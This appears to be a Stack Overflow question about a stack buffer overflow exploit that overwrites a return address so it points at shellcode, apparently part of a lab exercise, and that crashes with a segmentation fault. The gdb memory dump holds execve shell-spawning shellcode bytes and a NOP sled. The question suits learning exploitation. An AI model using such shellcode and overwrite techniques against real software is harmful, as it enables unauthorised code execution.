How to preserve address of buffer on the stack after overflow attack

I am doing a buffer overflow exploit and am trying to overwrite the return address 0x08048944 and point it towards my shellcode, which starts next to the address 0xffffda30.

  0xffffda30:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e
  0xffffda40:     0x99e18953      0x80cd0bb0      0x90909090      0x90909090
  0xffffda50:     0x90909090      0x90909090      0x90909090      0x90909090
  0xffffda60:     0xffffd760      0x000002fc      0x0804b410      0x00000304
  0xffffda70:     0xf7fbdd60      0xffffdad0      0xffffdab8      0x08048944

The buffer itself is at the address 0xffffd760, after 0xffffda60. However, I am unable to overwrite it without receiving a segmentation fault. Below is my exploit file, which is a bunch of NOPs. I convert the file to binary using a Python converter script so that I can feed the badfile into gdb. I have tried just copying the address of the buffer and the three addresses following it into my exploit file, so that the area remains unchanged, and then adding more NOPs afterwards until I reach the return address, but it still results in a segmentation fault.

asked on Stack Overflow Oct 27, 2020 by akatim97
